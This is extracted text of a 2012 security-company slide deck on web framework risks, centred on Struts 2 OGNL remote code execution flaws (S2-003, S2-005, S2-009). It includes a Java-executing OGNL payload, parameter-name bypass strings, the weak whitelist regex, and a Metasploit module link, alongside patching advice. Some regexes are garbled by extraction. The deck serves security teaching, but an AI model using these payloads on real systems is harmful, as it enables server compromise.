Advanced Web Security

dewberryeventΑσφάλεια

2 Νοε 2013 (πριν από 4 χρόνια και 10 μέρες)

465 εμφανίσεις

Tel +41 55-214 41 60
Fax +41 55-214 41 61
team@csnc.ch
www.csnc.ch
Compass Security AG
Glärnischstrasse 7
Postfach 1628
CH-8640 Rapperswil
Advanced Web Security
Philipp Oesch
01.03.2012
© Compass Security AG
Slide 2
© Compass Security AG
Slide 3
www.csnc.ch
Agenda
￿
New Challenges Today
￿
Risks with Open Source & Standard Frameworks
￿
Live Hacking Demo – Struts 2
￿
Recommendations
￿
Live Hacking Demo – (XXE & MySQL UDF)
￿
New HTTP Headers
© Compass Security AG Slide 4
© Compass Security AG
Slide 5
© Compass Security AG
Slide 7
www.csnc.ch
Technology Stack Today
© Compass Security AG
Slide 8
© Compass Security AG
Slide 9
www.csnc.ch
Competence / Responsibilities
Development
￿
Programming of applications
￿
Bugfixing of applications
Operations
￿
Deployment in the productive environment
￿
Backup & Logging
￿
System updates
￿
Operation system
￿
Installed software
￿
System hardening
But Who is responsible for?
￿
Secure configuration of used frameworks
￿
Updating/Patching from used framework & libraries
￿
Overall security
© Compass Security AG Slide 10
© Compass Security AG
Slide 11
www.csnc.ch
Don’t forget to patch the framework
Framework libraries are often forgotten in the update Process!
© Compass Security AG Slide 12
© Compass Security AG
Slide 13
www.csnc.ch
Struts 2 Framework - OGNL INTRO
© Compass Security AG Slide 14
© Compass Security AG
Slide 15
www.csnc.ch
Struts 2 Framework - OGNL INTRO
But it is also possible to execute Java Code!
<s:property value="(
#context[\"xwork.MethodAccessor.denyMethodExecution\"]= new
java.lang.Boolean(false)
,
#_memberAccess[\"allowStaticMethodAccess\"]= new java.lang.Boolean(true)
,
@java.lang.Runtime@getRuntime().exec('calc.exe')
)"/>
© Compass Security AG
Slide 17
www.csnc.ch
Struts 2 - Vulnerabilities
© Compass Security AG Slide 18
www.csnc.ch
Struts 2 - Live Hacking Demo
POST https://ebanking.hacking-lab.com/Login.action
Malicious_OGNL_Expression
=true
username=Oesch
LoginBean.set<
Malicious_OGNL_Expression
>(‘true’)
Remote Code Execution Vulnerability S2-003/S2-005
Malicious_OGNL_Expression is executed and can:- Access the user session!
- Execute arbitrary code on the server!
© Compass Security AG
Slide 19
www.csnc.ch
Struts 2 - Live Hacking Demo
Vulnerability S2-003 (Struts 2.0.0 - Struts 2.0.11.2)
￿
Problem: malicious OGNL expression in parameter name
￿
Patch: Regexp for allowed parameter names (Whitelist)
Whitelist was not restrictive enough -> S2-005!
Vulnerability S2-005 (Struts 2.0.0 - Struts 2.1.8.1 )
￿
Problem: malicious OGNL expression in parameter name
￿
Patch: Improved regexp for allowed parameter names (Whitelist)
Malicious OGNL expression in parameter name was not possible anymore but
remote code execution was still possible! -> S2-009!
© Compass Security AG Slide 20
www.csnc.ch
Struts 2 - Vulnerabilities
© Compass Security AG
Slide 21
www.csnc.ch
Struts 2 - Live Hacking Demo
POST https://ebanking.hacking-lab.com/Login.action
password=
Malicious_OGNL_Expression
top['password'](0)
=true
LoginBean.setPassword(‘Malicious_OGNL_Expression’)
LoginBean.set top['password'](0) (‘true’)
Remote Code Execution Vulnerability S2-009
WhitelistPattern=[a-zA-Z0-9\.\]\[\(\)_']+
password=
Malicious_OGNL_Expression
top['password'](0)
is a valid OGNL expression
which evaluates the value fromthe parameter
password which is already on the
Action Context-Stack!
Malicious_OGNL_Expression is executed !
Remote Code Execution!
© Compass Security AG Slide 22
www.csnc.ch
Struts 2 - Live Hacking Demo
© Compass Security AG
Slide 23
www.csnc.ch
Comparing the Source Code:
￿
Vulnerable version (S2-009): Struts 2.3.1.1/ognl 3.0.3 /xwork-core.2.3.1.1
￿
Following pattern was used to filter attack string in attribute names
￿
Pattern====
[a[a[a[a----zAzAzAzA----Z0Z0Z0Z0----9999\\\\....\\\\]]]]\\\\[[[[\\\\((((\\\\)_']+)_']+)_']+)_']+
￿
Attack String in parameter name:
top['password'](0)top['password'](0)top['password'](0)top['password'](0)
￿
Current Version: Struts 2.3.1.2 / ognl 3.0.4 / xwork-core.2.3.1.2
￿
Pattern for attribute name changed
￿
New Pattern=
\\\\w+((w+((w+((w+((\\\\....\\\\w+)|(w+)|(w+)|(w+)|(\\\\[[[[\\\\d+d+d+d+\\\\])|(])|(])|(])|(\\\\((((\\\\d+d+d+d+\\\\))|())|())|())|(\\\\['['['['\\\\w+'w+'w+'w+'\\\\])|(])|(])|(])|(\\\\('('('('\\\\w+'w+'w+'w+'\\\\)))*)))*)))*)))*
Struts 2 – Source Code Check
© Compass Security AG Slide 24
www.csnc.ch
Upgrade to Struts 2.3.1.2.
© Compass Security AG
Slide 25
www.csnc.ch
Struts2 Metasploit Module
http://www.metasploit.com/modules/exploit/multi/http/struts_code_exec
© Compass Security AG
Slide 26
© Compass Security AG
Slide 27
www.csnc.ch
How to protect?
© Compass Security AG
Slide 28
© Compass Security AG
Slide 29
© Compass Security AG
Slide 31
www.csnc.ch
XXE UDF - Live Hacking Demo
© Compass Security AG Slide 32
www.csnc.ch
XXE UDF - Live Hacking Demo
© Compass Security AG
Slide 33
© Compass Security AG
Slide 35
© Compass Security AG
Slide 37
© Compass Security AG
Slide 39
www.csnc.ch
Visit: http://blog.csnc.ch
© Compass Security AG Slide 40
www.csnc.ch
Thank You
© Compass Security AG
Slide 41
www.csnc.ch
References
http://struts.apache.org/2.2.1/docs/s2-003.html
http://struts.apache.org/2.2.1/docs/s2-005.html
http://struts.apache.org/2.x/docs/s2-009.html
http://blog.csnc.ch/2012/01/new-http-headers/